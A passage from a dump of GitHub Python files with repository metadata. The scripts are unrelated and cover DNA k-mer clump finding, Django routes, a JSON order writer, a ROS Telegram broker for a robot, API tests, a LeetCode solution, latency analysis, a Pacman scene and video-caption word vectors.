t))\n\ngenome1='CGGACTCGACAGATGTGAAGAACGACAATGTGAAGACTCGACACGACAGAGTGAAGAGAAGAGGAAACATTGTAA'\nk=5\nl=50\nt=4\nprint( findclump(genome1, k, l, t))\n\ngenome2='tttttttttttttttttttttTTTTTTTTTTTT'\nk=10\nl=579\nt=17\nprint( findclump(genome2, k, l, t))\n\n\n# region CHARGING STATION: Finding Frequent Words by Sorting\n#http://codereview.stackexchange.com/questions/37932/genome-string-clump-finding-problem\n# region CHARGING STATION: Solving the Clump Finding Problem\n# region CHARGING STATION: The Frequency Array\nimport itertools\n\n\ndef patterntonumber(pattern):\n patterns = [''.join(x) for x in itertools.product(['A', 'C', 'G', 'T'], repeat=len(pattern))]\n return patterns.index(pattern)\n\nprint(patterntonumber('ATGCAA'))\n\ndef numbertopattern(number, k):\n patterns = [''.join(x) for x in itertools.product(['A', 'C', 'G', 'T'], repeat=k)]\n return patterns[number]\n\ndef computefrequency(text, k):\n result = [0 for i in range(4 ** k)]\n for i in range(len(text) - k + 1):\n result[patterntonumber(text[i:i+k])] += 1\n return result\n\n\ndef fasterfrequentwords(text, k):\n frequentpatterns, frequencyarray = [], computefrequency(text, k)\n maxCount = max(frequencyarray)\n for i in range(4 ** k - 1):\n if frequencyarray[i] == maxCount:\n frequentpatterns.append(text[i:i+k])\n return frequentpatterns\n\ndef betterclumpfinding(genome, k, l, t):\n result, clump = set(), [0 for i in range(4 ** k)]\n frequencyarray = computefrequency(genome[:l], k)\n for i in range(4 ** k):\n if frequencyarray[i] >= t:\n clump[i] = 1\n for i in range(1, len(genome) - l + 1):\n frequencyarray[patterntonumber(genome[i-1:i+k-1])] -= 1\n j = patterntonumber(genome[i+l-k:i+l])\n frequencyarray[j] += 1\n if frequencyarray[j] >= t:\n clump[j] = 1\n for i in range(4 ** k):\n if clump[i] == 1:\n result.add(numbertopattern(i, k))\n return result\n# endregion\n\n#betterclumpfinding(genome, k, l, t)\ngenome3='CGGACTCGACAGATGTGAAGAACGACAATGTGAAGACTCGACACGACAGAGTGAAGAGAAGAGGAAACATTGTAA'\nk3=5\nl3=50\nt3=4\nprint(betterclumpfinding(genome3, k3, l3, t3))\n\nprint('i do not know555')\n\nimport math\nimport numpy\n#genome='CGGACTCGACAGATGTGAAGAACGACAATGTGAAGACTCGACACGACAGAGTGAAGAGAAGAGGAAACATTGTAA'\n#k=5\n#L=50\n#t=4\ndef betterClumpFinding(genome,k,L,t):\n frequentPatterns = []\n clump = numpy.zeros( math.pow(4,k), dtype=numpy.int )\n text = genome[0:L]\n frequencyArray = computingFrequencies(text,k)\n for i in range(len(clump)):\n if frequencyArray[i] >= t:\n clump[i] = 1\n for i in range(1,len(genome)-L+1):\n firstPattern = genome[i-1:i-1+k]\n j = patternToNumber(firstPattern)\n frequencyArray[j] -= 1\n lastPattern = genome[i+L-k:i+L]\n j = patternToNumber(lastPattern)\n frequencyArray[j] += 1\n if frequencyArray[j] >= t:\n clump[j] = 1\n for i in range(len(clump)):\n if clump[i] == 1:\n pattern = numberToPattern(i,k)\n frequentPatterns.append(pattern)\n return frequentPatterns\n\ndef testClumpFinding():\n f = open(\"file1\", r)\n lines = f.readlines()\n genome = lines[0].rstrip()\n k,L,t = map(int,lines[1].rstrip().split(\" \"))\n output = betterClumpFinding(genome,k,L,t)\n print(\" \".join(map(str, output)))\n\ndef computingFrequencies(text, k):\n frequencyArray = numpy.zeros( math.pow(4,k), dtype=numpy.int )\n for i in range(len(text)-k+1):\n pattern = text[i:i+k]\n j = patternToNumber(pattern)\n frequencyArray[j] += 1\n\n return frequencyArray\n\ndef patternToNumber(pattern):\n if len(pattern) == 0:\n return 0\n prefix = pattern[:-1]\n symbol = pattern[-1:]\n return 4*patternToNumber(prefix) + symbolToNumber(symbol)\n\ndef symbolToNumber(symbol):\n return {\n 'A':0,\n 'C':1,\n 'G':2,\n 'T':3\n }[symbol]\n\ndef numberToPattern(number,k):\n if k == 1:\n return numberToSymbol(number)\n quotient, remainder = divmod(number,4)\n prefixPattern = numberToPattern(quotient,k-1)\n symbol = numberToSymbol(remainder)\n return prefixPattern+symbol\n\ndef numberToSymbol(number):\n return {\n 0:'A',\n 1:'C',\n 2:'G',\n 3:'T'\n }[number]\n\npattern ='ATGCAA'\n\nprint(patternToNumber(pattern))\n\nseq = 'ACGTTGCATGTCGCATGATGCATGAGAGCT'\nn = 4\nk = 1\ndef countKmers(seq,n,k):\n kmers={}\n kfinals={}\n for i in range(len(seq)-k+1):\n kmer=seq[i:(i+k)]\n if(kmers.has_key(kmer)):\n kmers[kmer]+=1\n else:\n kmers[kmer]=1\n for i in kmers.keys():\n if(kmers[i]>=n):\n kfinals[i]=kmers[i]\n return kfinals\nprint (countKmers(seq,n,k))\n","repo_name":"TatyanaV/Finding-Hidden-Messages-in-DNA-Bioinformatics-I--and-Genomic-Data-Science-and-Clustering-V-","sub_path":"count1.py","file_name":"count1.py","file_ext":"py","file_size_in_byte":8532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17968921521","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('login', views.user_login, name=\"login\"),\n path('', views.home, name=\"home\"),\n path('register', views.register, name=\"register\"),\n path('create', views.create, name=\"create\"),\n path('navbar', views.navbar, name=\"navbar\"),\n path('logout', views.user_logout, name=\"logout\"),\n path('completed/', views.completed, name=\"completed\"),\n path('read/', views.read, name=\"read\"),\n]\n","repo_name":"gagansingh3785/Tasks","sub_path":"tasks/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40156988398","text":"\"\"\"\ntask_2_2\nЗадание на закрепление знаний по модулю json. Есть файл orders в формате JSON\n с информацией о заказах. Написать скрипт, автоматизирующий его заполнение данными.\n\"\"\"\n\nimport json\nfrom pprint import pprint\n\n\ndef write_order_to_json(file, order):\n with open(file, encoding='utf-8') as f_read:\n content = f_read.read()\n my_orders = json.loads(content)\n my_orders['orders'].append(order)\n\n with open(file, 'w', encoding='utf-8') as f_write:\n my_orders_as_string = json.dumps(my_orders, sort_keys=True, indent=4, ensure_ascii=False)\n f_write.write(my_orders_as_string)\n\n # with open(file, 'w', encoding='utf-8') as f_write:\n # json.dump(my_orders, f_write, sort_keys=True, indent=4, ensure_ascii=False)\n\n with open(file, 'r', encoding='UTF-8') as f_check:\n content_check = json.load(f_check)\n pprint(content_check)\n\n\nif __name__ == '__main__':\n my_file = 'orders.json'\n order_1 = {\n 'item': 'mobile_phone',\n 'quantity': 5,\n 'price': 215.99,\n 'buyer': 'Conor McGregor',\n 'date': '01.01.2022'\n }\n order_2 = {\n 'item': 'tablet',\n 'quantity': 2,\n 'price': 775.99,\n 'buyer': 'Andy McMagadan',\n 'date': '10.01.2022'\n }\n\n write_order_to_json(my_file, order_1)\n write_order_to_json(my_file, order_2)\n","repo_name":"AndyMcMagadan/client_server_apps","sub_path":"hw_2_2.py","file_name":"hw_2_2.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6357654922","text":"#!/usr/bin/env python \n\n#########################################################################\n# _________ ___________ ___________ ____ ____ ___________ #\n# / _____/ \\__ ___/ \\_ _____/ \\ \\ / / \\_ _____/ #\n# \\_____ \\ | | | __)_ \\ Y / | __)_ #\n# / \\ | | | \\ \\ / | \\ #\n# /_______ / /\\ |____| /\\ /_______ / /\\ \\___/ /\\ /_______ / /\\ #\n# \\/ \\/ \\/ \\/ \\/ \\/ \\/ \\/ #\n# #\n#########################################################################\n# #\n# File Name: telegram_broker.py #\n# #\n# Maintainer:vinu #\n# #\n# Version: v1.0.2 (alpha) #\n# #\n# Notes: Version with functional telegram messaging, publish menu messa-#\n# ges & recieve instructions from telegram. Added ubidots pub and#\n# some bug to fix later #\n# #\n# Latest edit: vinu #\n# #\n# Date: 13.11.2022 #\n#########################################################################\n\nfrom os import wait\nimport rospy \nimport time\n#Import Datatypes\nfrom std_msgs.msg import String\n\n#Clase para comunicarse con telegram\nclass TelegramComm(): \n def __init__(self): \n rospy.on_shutdown(self.cleanup) #Definir fucnion de cierre\n self.pub_tele = rospy.Publisher('pub_Telegram', String, queue_size=1) #Publish data to telegram\n self.pub_inst = rospy.Publisher('instr_tb', String, queue_size=1) #Publish Instructions to tb node\n self.pub_ubid = rospy.Publisher('ubidots', String, queue_size=1) #Publish Instructions to tb node\n rospy.Subscriber(\"state_tb\", String, self.state_tb_callback) #Subscribe to tb state info\n rospy.Subscriber(\"sub_Telegram\", String, self.tlgrm_callback) #Subscribe to telegram instructions\n #********** INIT NODE **********### \n r = rospy.Rate(2) #1Hz \n print(\"Node initialized 2hz\")\n #Init variables\n self.state = 0 #State recieved variable\n self.tlgrm_msg = '' #Telegram mesage empty variable\n op = '' #Empty option variable\n sent_menu1 = 0 #Menu1 flag\n menu1 = 10 #Menu1 option\n self.msg_flag = 0 #Telegram message flag\n nc_msg = 0 #NC robot flag\n resp_1 = 0 #Firts answe flag\n sent_menu2 = 0 #Menu2 flag\n posFile = '/home/vinu/catkin_ws/src/scf_reto/maps_tb/goals.txt' #Define psoitions file\n print('Initializing...')\n time.sleep(3)\n #While loop\n while not rospy.is_shutdown():\n print(\"\"\"--Telegram Broker v1.0.2--\n Developed by S.T.E.V.E for SCF\n Running...\n Publishing to /pub_Telegram & /inst_tb & /ubidots\n subscribed to /state_tb & /sub_Telegram\n \"\"\")\n #self.pub_tele.publish(\"Robot not conected\")\n #Resend Menu\n if self.tlgrm_msg in ['Menu','menu']: #If message in list\n sent_menu1 = 0 #Clear menu 1 flag\n sent_menu2 = 0 #Clear menu 2 flag\n self.msg_flag = 0 #Clear Tlgrm meg flag\n resp_1 = 0 #Clear Answer flag\n self.tlgrm_msg = '' #Clear telegram msg\n print('Displayig menu, again...')\n #First Selection\n if self.msg_flag and not nc_msg: #If msg flag and robot conected\n if resp_1 == 0: #Check first answer flag\n op = self.tlgrm_msg #Save instruction\n if op in ['0', 'D', 'd']: #if instruction in list\n menu1 = 0 #Save instruction\n resp_1 = 1 #First answer flag\n elif op in ['1','M','m']: #If inst in list\n menu1 = 1 #Save inst\n resp_1 = 1 #First answer flag\n else:\n menu1 = 10 #If selection invalid reset menu1\n self.tlgrm_msg = '' #Empty telegram msg\n\n if menu1 == 0: #Use op instruction\n print('definir puntos')\n if sent_menu2 == 0: #Sent menu 2 flag check\n #Open position file and read lines\n with open(posFile, 'r') as f:\n lines = f.read()\n print(lines)\n #Publish positions in telegram DEFINIR PUNTOS\n # + code for ubidots publish\n self.pub_tele.publish('Las posiciones guardads son:')\n print('processing...')\n time.sleep(1)\n self.pub_tele.publish(lines)\n time.sleep(1)\n self.pub_tele.publish(\"\"\"Escribir una posicion en el formato:\n[Nombre]:[X-coord],[Y-coord],[Angulo]\"\"\")\n\n sent_menu2 = 1 #Sent menu2 flag\n time.sleep(1)\n print('ubidots publish')\n self.pub_ubid.publish('D'+lines)\n print('ubidots publish f')\n\n ans = self.tlgrm_msg #Save msg as ans\n if ans.count(',')==2 and ans.count(':') == 1: #Validate ans format\n #name:x-coord,y-coord,yaw\n print('Writing new point')\n #open position file and write new line\n with open(posFile, 'a') as f:\n f.write(ans+ '\\n')\n self.pub_tele.publish('Pose guardada') #Publish mesage in telegram\n sent_menu2 = 0 #Reset menu2 flag\n sent_menu1 = 0 #Reset Menu1 flag\n op = '' #Clear op var\n menu1 = 10 #Reset menu1 var\n self.msg_flag = 0 #Clear msg recieved flag\n elif ans != '': #Check for empty answer\n sent_menu2 = 0 #Resend menu2\n self.tlgrm_msg = '' #Empty telegram message\n \n elif menu1 == 1: #Menu option 1\n print('Moverse')\n if sent_menu2 == 0: #Check if menu2 sent\n #Open position file\n with open(posFile, 'r') as f:\n lines = f.read()\n print(lines)\n #Publish Positions in telegram\n # + code for ubidots publish\n self.pub_tele.publish('Escribir el nombre de una de las posiciones guardadas:')\n print('processing...')\n time.sleep(1)\n self.pub_tele.publish(lines)\n time.sleep(1)\n self.pub_ubid.publish('M'+lines)\n self.tlgrm_msg = '' #Clear telegram Message\n sent_menu2 = 1 #Sent menu1 flag raised\n ans = self.tlgrm_msg #Save msg as ans\n if lines.find(ans) != -1 and ans !='': #If ans exixts and dif from empty\n time.sleep(1)\n print('Sending goal to brain')\n self.pub_inst.publish('1'+ans) #Publish goal to brain\n print('Sent goal to brain') \n time.sleep(3)\n sent_menu2 = 0 #Clear menu2 flag\n sent_menu1 = 0 #Clear menu1 flag\n op = '' #Clear op\n menu1 = 10 #Reset menu1 value\n self.msg_flag = 0 #Reset msg flag\n print('Objetivo enviado correctamente...')\n \n \n #Display Menu\n else:\n #Send first menu if robot conected\n if sent_menu1 == 0: #Check menu sent flag\n if self.state == 0: #Check robot state\n #Send Menu Message\n self.pub_tele.publish('\\U0001F7E9 MENU PRINCIPAL \\U0001F7E9 ')\n time.sleep(1)\n print('Idle Message')\n self.pub_ubid.publish(\"menu01\")\n time.sleep(1)\n self.pub_tele.publish(\"\"\"Opciones a realizar:\n[0] o [D] Definir puntos \\u26F3\\uFE0F\n[1] o [M] Moverse a un punto \\U0001F6F9\n[2] o [P] Parar el Robot \\U0001F6A8\"\"\")\n nc_msg = 0 #Reset not conected flag\n else:\n print('nc_robot')\n self.pub_tele.publish(\"Robot not conected\")\n time.sleep(1)\n self.pub_ubid.publish(\"NC_robot\")\n nc_msg = 1 #Raise nc flag\n sent_menu1 = 1 #Raise sent menu\n\n #Send Menu 1 if reconected bot\n if nc_msg and not self.state: #if nc flag raised but state is 0\n sent_menu1 = 0 #Resend menu\n \n r.sleep() #r sleep for while loop\n\n #Telegram Instruction Arrival\n def tlgrm_callback(self, msg_string):\n self.tlgrm_msg = msg_string.data #Save incoming sting\n print(\"Recieved \" + self.tlgrm_msg) \n self.msg_flag = 1 #Raice msg recieved flag\n if self.tlgrm_msg in ['2','P','p','paro','parar','stop']: #Check if stop signal\n self.pub_inst.publish('2') #Publish stop\n self.tlgrm_msg = '' #Clear msg\n self.pub_tele.publish('Se ha enviado un PARO')\n self.msg_flag = 0 #Reset msg flag\n # Telegram State Arrival\n def state_tb_callback(self, msg_string):\n self.state = int(msg_string.data)\n #Recive state from robot\n\n def cleanup(self): \n #End the function\n #kill the node\n \n print(\"---------------xxxxx-------------------Ded\")\n print(\" __\")\n print(\" w c(..)o (\")\n print(\" \\__(-) __)\")\n print(\" /\\ (\")\n print(\" /(_)___)\")\n print(\" w /|\")\n print(\" | |\")\n print(\"Vinu m m\") \n############################### MAIN PROGRAM #################################### \nif __name__ == \"__main__\": \n rospy.init_node(\"telegram_broker\", anonymous=True) \n TelegramComm()","repo_name":"RafaelV1nueza/SCF_ii","sub_path":"scripts/telegram_broker.py","file_name":"telegram_broker.py","file_ext":"py","file_size_in_byte":11630,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"22106983598","text":"import pytest\nfrom fatcat_openapi_client.rest import ApiException\n\nfrom fatcat_tools import authenticated_api, public_api\n\n\ndef test_authenticated_api():\n api = authenticated_api(\"http://localhost:9411/v0\")\n api.get_changelog()\n api.auth_check()\n\n\ndef test_public_api():\n api = public_api(\"http://localhost:9411/v0\")\n api.get_changelog()\n with pytest.raises(ApiException):\n api.auth_check()\n","repo_name":"internetarchive/fatcat","sub_path":"python/tests/tools_api.py","file_name":"tools_api.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"53"} +{"seq_id":"29313189627","text":"class Solution(object):\n def combinationSum4(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: int\n \"\"\"\n\n return self.combinationRecBacktracking(nums, target)\n dp_array=[-1 for i in range(target+1)]\n dp_array[0]=1\n print(dp_array)\n return self.combinationRecDP(nums, target, dp_array)\n\n def combinationRecBacktracking(self, nums, target):\n \tprint(nums, target)\n \tif target==0:\n \t\treturn 1\n\n \tres=0\n \tfor i in range(len(nums)):\n \t\tif target-nums[i]>=0:\n \t\t res+=self.combinationRecBacktracking(nums, target-nums[i])\n \t\t print(\"res--\"+str(res))\n\n \treturn res\n\n def combinationRecDP(self, nums, target, dp_array):\n \tif dp_array[target]!= -1:\n \t\treturn dp_array[target]\n\n \tresult=0\n \tfor i in range(len(nums)):\n \t\tif target-nums[i]>=0:\n \t\t\tresult+=self.combinationRecDP(nums, target-nums[i], dp_array)\n \tdp_array[target]=result\n\n \treturn dp_array[target]\n\n \n\n\n\nif __name__==\"__main__\":\n\ts=Solution()\n\tprint(s.combinationSum4([1, 2, 3], 4))","repo_name":"rsumukha/leetcode","sub_path":"377_combination_sum_4.py","file_name":"377_combination_sum_4.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36134747178","text":"# 计算所有以python代码为答案的M2\n\nimport json\nimport os\nimport zipfile\n\nf = open('averageDepthApproach/averageDepth.json', encoding='utf-8')\nres = f.read()\ndata = json.loads(res)\nf1 = open(\"cAnswer.json\", encoding=\"utf-8\")\nres1 = f1.read()\ndata1 = json.loads(res1)\n\ncQuestion = []\nfor key in data1:\n cQuestion.append(int(key[\"case_id\"]))\n\npos = 0\npythonQuestion = []\ndepth = []\nfor key in data:\n if key[\"case_Id\"] not in cQuestion:\n pythonQuestion.append(key[\"case_Id\"])\n pos += 1\n\n# path = \"C:\\\\Users\\\\asus\\\\Desktop\\\\nestedBlock1\"\nz = zipfile.ZipFile('../../../data_collection/answers.zip')\nfor i in range(0, pos):\n # print(pythonQuestion[i])\n # filename = str(pythonQuestion[i]) + \".py\"\n # path1 = os.path.join(path, filename)\n path1 = \"answers/\" + str(pythonQuestion[i]) + \".py\"\n f = z.open(path1)\n tempDepth = 0\n count = 0\n tempDepth1 = []\n for line in f:\n line = str(line, encoding='utf-8')\n line = line.replace('\\t', ' ')\n temp = 0\n line1 = line.strip()\n if len(line1) == 0 or line1.startswith('#'):\n continue\n for i in line:\n if i.isspace():\n temp += 1\n else:\n count += 1\n break\n tempDepth1.append(temp)\n length = len(tempDepth1)\n for i in range(0, length - 1):\n if tempDepth1[i] > tempDepth1[i + 1]:\n tempDepth += tempDepth1[i]\n if tempDepth1[length - 1] != 0:\n tempDepth += tempDepth1[length - 1]\n\n depth1 = (tempDepth // 4) / count\n depth.append(depth1)\n\nlis = []\nfor i in range(0, pos):\n dic = {\"case_Id\": pythonQuestion[i], \"Average Block Depth\": depth[i]}\n lis.append(dic)\n\nprint(len(lis))\nwith open(\"averageDepthApproach/averageDepthOfPython.json\", \"w\") as f:\n json.dump(lis, f)\n print(\"finished\")\n","repo_name":"Gabrilll/StatisticalMethodofSoftwareEngineering","sub_path":"analysis_of_code/matrix/dimensions/averageDepthOfPython.py","file_name":"averageDepthOfPython.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7455844792","text":"from collections import namedtuple\nfrom datetime import datetime, timedelta\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sqlite3\nfrom typing import List\nimport math\nimport psutil\n\nMeasurement = namedtuple('Measurement', ['time', 'measurement'])\n\n# DATABASE = 'flask_monitoringdashboard.db'\nDATE = '2021-01-08'\nSERVER = 'A'\nLENGTH = 10\nBASE_TRAFFIC_PER_MINUTE = 100\nREGRESSION_LEVEL = 2\nREGRESSION_MAGNITUDE = 1\nWINDOW = 10\nWINDOW_SIZE = timedelta(seconds=WINDOW)\n\nDATABASE = 'db_' + DATE + '_' + SERVER + '_length_' + str(LENGTH) + '_traffic_' + str(BASE_TRAFFIC_PER_MINUTE) + '_regression_' + str(REGRESSION_LEVEL) + \"_\" + str(REGRESSION_MAGNITUDE) + '.db'\n\n#####\n# DB Management\n#####\n\ndef load_db_cursor():\n return sqlite3.connect(DATABASE).cursor()\n\n\ndef load_measurements_from_db(query):\n cursor = load_db_cursor()\n cursor.execute(query)\n\n return cursor.fetchall()\n\n\ndef format_date(date):\n return datetime.strptime(date, '%Y-%m-%d %H:%M:%S.%f')\n\n\ndef load_cpu_usage() -> List[Measurement]:\n resultset = load_measurements_from_db(\n 'SELECT * FROM CustomGraphData ORDER BY time ASC'\n )\n\n return [Measurement(\n time=format_date(d[2]),\n measurement=d[3]\n ) for d in resultset]\n\n\ndef load_residence_times() -> List[Measurement]:\n resultset = load_measurements_from_db(\n 'SELECT duration, time_requested FROM Request ORDER BY time_requested ASC'\n )\n\n return [Measurement(\n time=format_date(d[1]),\n measurement=d[0]\n ) for d in resultset]\n\n#####\n# CPU data processing\n#####\n\ndef average_time_from_window(window):\n return window[0][0] + WINDOW_SIZE / 2\n\n\ndef average_cpu_from_window(window):\n return np.average([w[1] for w in window])\n\n\ndef average_for_windows(measurements: List[Measurement]):\n if not measurements: return []\n\n measurement_delta = measurements[1].time - measurements[0].time\n per_window = int(round(WINDOW_SIZE / measurement_delta))\n count = len(measurements) / per_window\n print(measurement_delta, per_window, count)\n \n windows = np.array_split(measurements, count)\n results = [Measurement(\n time = average_time_from_window(window),\n measurement = average_cpu_from_window(window)\n ) for window in windows]\n\n return results\n\n\n#####\n# Request data processing\n#####\n\ndef create_empty_cpu_buckets():\n buckets = {}\n for i in range(101): buckets[i] = []\n\n return buckets\n\n\ndef time_difference(time1, time2):\n return abs((time1 - time2).total_seconds())\n\n\ndef closest_cpu_measurement(cpu_usage: List[Measurement], time) -> List[Measurement]:\n deltas = [dict(\n time_diff = time_difference(time, c.time),\n cpu_measurement = c.measurement\n ) for c in cpu_usage]\n smallest_delta = sorted(deltas, key=lambda k: k['time_diff'])[0]\n cpu_usage = smallest_delta['cpu_measurement']\n\n return int(round(cpu_usage))\n\n\ndef populate_buckets(residence_times, buckets, cpu_usage):\n for measurement in residence_times:\n cpu_measurement = closest_cpu_measurement(cpu_usage, measurement.time)\n buckets[cpu_measurement].append(measurement)\n\n return buckets\n\n\ndef average_latency_for_bucket(buckets, cpu):\n if (len(buckets[cpu]) == 0): return None\n\n measured_latencies = [m.measurement for m in buckets[cpu]]\n\n return np.average(measured_latencies)\n\n\ndef requests_per_minute(minute):\n traffic_multiplier = -math.cos(4 * minute / math.pi) + 2\n\n return traffic_multiplier * BASE_TRAFFIC_PER_MINUTE\n\n#####\n# Main\n#####\n\nif __name__ == '__main__':\n # Load and process CPU data to get average CPU usage\n cpu_usage_measurements = load_cpu_usage()\n cpu_usage_averages = average_for_windows(cpu_usage_measurements)\n # Load request data\n residence_times = load_residence_times()\n print(len(residence_times))\n # Create CPU usage buckets\n buckets = create_empty_cpu_buckets()\n buckets = populate_buckets(residence_times, buckets, cpu_usage_averages)\n # Average request latency by CPU usage\n latency_per_bucket = [dict(\n latency = average_latency_for_bucket(buckets, cpu),\n cpu_usage = cpu\n ) for cpu in buckets.keys()]\n average_latency = [c for c in sorted(\n latency_per_bucket, key=lambda r: r['cpu_usage']\n ) if c['latency'] and c['latency'] < 1000 and\n c['cpu_usage'] > 5 and c['cpu_usage'] < 95]\n print(average_latency)\n\n cpu_usages = [r['cpu_usage'] for r in average_latency]\n latencies = [r['latency'] for r in average_latency]\n\n # Plot request frequency over time\n plt.figure()\n plt.subplot(2, 1, 1)\n times = np.arange(0, LENGTH, 1 / 60)\n rm = [requests_per_minute(t) for t in times]\n plt.plot([t*60 for t in times], rm)\n plt.axhline(y=min(rm), linestyle='--', label='Minimum RPM')\n print(max(rm))\n plt.axhline(y=max(rm), linestyle='--', label='Maximum RPM')\n plt.title('RPM over time')\n plt.xlabel('Time in seconds since start simulation')\n plt.ylabel('RPM')\n plt.legend()\n\n # Plot CPU usage over time\n plt.subplot(2, 1, 2)\n plt.xticks(rotation=45)\n plt.title('CPU usage over time')\n plt.xlabel('Time in seconds since start simulation')\n start = cpu_usage_averages[0].time\n plt.plot([(measurement.time - start).total_seconds() for measurement in cpu_usage_averages],\n [measurement.measurement for measurement in cpu_usage_averages])\n\n # Plot CPU usage versus latency\n plt.figure()\n plt.title('CPU usage vs latency')\n plt.plot(cpu_usages, latencies, 'x-')\n x = np.arange(0, 100, 0.01)\n z = np.polyfit(cpu_usages, latencies, 1)\n p = np.poly1d(z)\n plt.plot(x, p(x), 'r--', label='Trend line')\n plt.fill_between(cpu_usages, latencies)\n plt.xlabel('CPU Usage')\n plt.ylabel('Latency')\n plt.legend()\n plt.xlim(0, 100)\n MIN_LATENCY = 0.0\n MAX_LATENCY = 500.0\n plt.ylim(MIN_LATENCY, MAX_LATENCY)\n plt.savefig(SERVER + '_traffic_' + str(BASE_TRAFFIC_PER_MINUTE) + '_window_' + str(WINDOW) + '_regression_' + str(REGRESSION_LEVEL) + '_latency' + '.png')\n\n # Plot CPU usage vs service time\n plt.figure()\n service_times = [c['latency'] * (1 - c['cpu_usage'] / 100)\n for c in average_latency]\n cpu_usages = [c['cpu_usage'] for c in average_latency]\n plt.plot(cpu_usages, service_times)\n plt.fill_between(cpu_usages, service_times)\n plt.xlabel('CPU usage')\n plt.ylabel('Service time')\n plt.axhline(y=np.median(service_times), color='r', linestyle='-',\n label='Median service time')\n plt.legend()\n plt.xlim(0, 100)\n MIN_LATENCY = 0.0\n MAX_LATENCY = 350.0\n plt.ylim(MIN_LATENCY, MAX_LATENCY)\n plt.savefig(SERVER + '_traffic_' + str(BASE_TRAFFIC_PER_MINUTE) + '_window_' +\n str(WINDOW) + '_regression_' +\n str(REGRESSION_LEVEL) + '_service' + '.png')\n \n plt.show()\n","repo_name":"alexander34ro/flask-monitoring-dashboard-data-miner","sub_path":"prototype.py","file_name":"prototype.py","file_ext":"py","file_size_in_byte":6878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37100761145","text":"\"\"\"\nProgram to animate a Pacman character.\n\"\"\"\n\nfrom pgl import GWindow, GArc, GOval, GLine, GRect\n\nGW_WIDTH = 900\nGW_HEIGHT = 400\nPACMAN_RADIUS = 50\nPILL_RADIUS = 10\nPACMAN_SPEED = 2\n\n\ndef pacman():\n \"\"\"Draws and animates a pacman across the screen\"\"\"\n\n def setup_scene():\n \"\"\"\n Creates the scene, including the background, the corridor walls, and\n the yellow pills.\n\n Returns the background object for later comparisons to ensure that the\n background is not removed.\n \"\"\"\n midx, midy = GW_WIDTH / 2, GW_HEIGHT / 2\n # Creating the background\n bg = GRect(GW_WIDTH,GW_HEIGHT)\n bg.set_filled(True)\n bg.set_color(\"black\")\n gw.add(bg)\n # Creating the corridor walls\n for shift in range(-1, 2, 2):\n line = GLine(\n 0,\n midy + shift * PACMAN_RADIUS * 1.25,\n GW_WIDTH,\n midy + shift * PACMAN_RADIUS * 1.25,\n )\n line.set_color(\"blue\")\n line.set_line_width(10)\n gw.add(line)\n # Creating the pills\n y = GW_HEIGHT / 2 - PILL_RADIUS\n for x in range(20, GW_WIDTH, 100):\n if x < midx - PACMAN_RADIUS or x > midx + PACMAN_RADIUS:\n pill = GOval(x, y, 2 * PILL_RADIUS, 2 * PILL_RADIUS)\n pill.set_filled(True)\n pill.set_color(\"yellow\")\n gw.add(pill)\n return bg\n\n\n gw = GWindow(GW_WIDTH, GW_HEIGHT)\n bg = setup_scene()\n\n\nif __name__ == \"__main__\":\n pacman()\n","repo_name":"rembold-cs151-master/Section07","sub_path":"Problem.py","file_name":"Problem.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14800507709","text":"import torch\nimport numpy as np\nimport os\nfrom tqdm import tqdm\n\n'''\nEvery caption of a video => convert to 2D Matrix and store in pt file.\ne.g = {'vid':[arry(10,300), array(20, 300)]} means 2 captions each containing\n10 and 20 words resp. Each word is represented by vector of dim 300.\n'''\n\ndictionary_path = '../../../dataset/MSVD/word2vec/word2vec.pt'\ndictionary = torch.load(dictionary_path)\n\ndataset_path = '../../../dataset/MSVD/dataset_english.txt'\nassert os.path.exists(dataset_path), 'dataset path does not exists'\n\noutput_path = '../../../dataset/MSVD/caption/'\n\nprevious_id = 'mv89psg6zh4_33_46'\nvideo_cap_feature = []\n\ndef removeNonEnglish(s):\n english_word = \"\".join(i for i in s if i.isalpha()==True)\n return english_word\n\nwith open(dataset_path, 'r') as file:\n for _, row in enumerate(tqdm(file)):\n\n row_list = row.split('\\t')\n vid = row_list[0]\n caption = row_list[1]\n\n # Determine num of words in caption\n word_per_caption = 0\n for word in caption.split():\n word = word.strip()\n if '-' in word:\n word_list = word.split('-')\n elif ',' in word:\n word_list = word.split(',')\n elif '/' in word:\n word_list = word.split('/')\n else:\n word_list = [word]\n\n for w in word_list:\n w = removeNonEnglish(w)\n if w != '' and w != ' ':\n word_per_caption += 1\n\n caption_array = np.zeros((word_per_caption, 300))\n\n # Fill caption array with word vectors.\n word_index = 0\n for word in caption.split():\n word = word.strip()\n word_list = []\n if '-' in word:\n word_list = word.split('-')\n elif ',' in word:\n word_list = word.split(',')\n elif '/' in word:\n word_list = word.split('/')\n else:\n word_list = [word]\n\n for w in word_list:\n w = removeNonEnglish(w)\n if w != '' and w != ' ':\n # print(w)\n # print(dictionary[w].shape)\n # print('caption array', caption_array.shape)\n caption_array[word_index] = dictionary[w]\n word_index += 1\n\n\n if vid != previous_id:\n caption_dict = {previous_id:video_cap_feature}\n torch.save(caption_dict, output_path + previous_id + '.pt')\n previous_id = vid\n video_cap_feature = []\n\n 